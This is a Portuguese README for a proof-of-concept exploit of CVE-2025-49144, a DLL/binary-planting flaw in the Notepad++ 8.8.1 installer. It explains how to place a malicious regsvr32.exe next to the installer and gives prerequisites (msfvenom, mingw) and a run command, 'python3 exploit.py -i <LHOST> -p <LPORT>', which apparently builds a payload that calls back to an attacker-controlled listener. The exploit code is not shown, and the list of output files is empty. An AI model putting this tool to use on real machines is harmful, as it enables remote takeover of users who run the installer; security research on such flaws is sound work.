
Prova de Conceito (PoC) que explora a vulnerabilidade CVE-2025-49144 no instalador do Notepad++ 8.8.1.
Este repositório contém uma Prova de Conceito (PoC) funcional que explora a vulnerabilidade CVE-2025-49144 no instalador do Notepad++ 8.8.1. A execução maliciosa ocorre ao colocar um binário (regsvr32.exe) no mesmo diretório do instalador vulnerável. Quando o instalador é executado, ele herda o contexto e aciona o payload.
⚠️ Aviso
Este código é estritamente para fins educacionais e de pesquisa apenas. O uso não autorizado em sistemas sem permissão explícita pode constituir violação da lei.
O autor não se responsabiliza por qualquer uso indevido ou atividade maliciosa envolvendo esta ferramenta.
msfvenom (parte do Metasploit Framework)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (deve ser colocado manualmente no mesmo diretório)python3 exploit.py -i <LHOST> -p <LPORT>
Exemplo:
python3 exploit.py -i 192.168.100.10 -p 4444
Isso gerará os seguintes arquivos:
[
]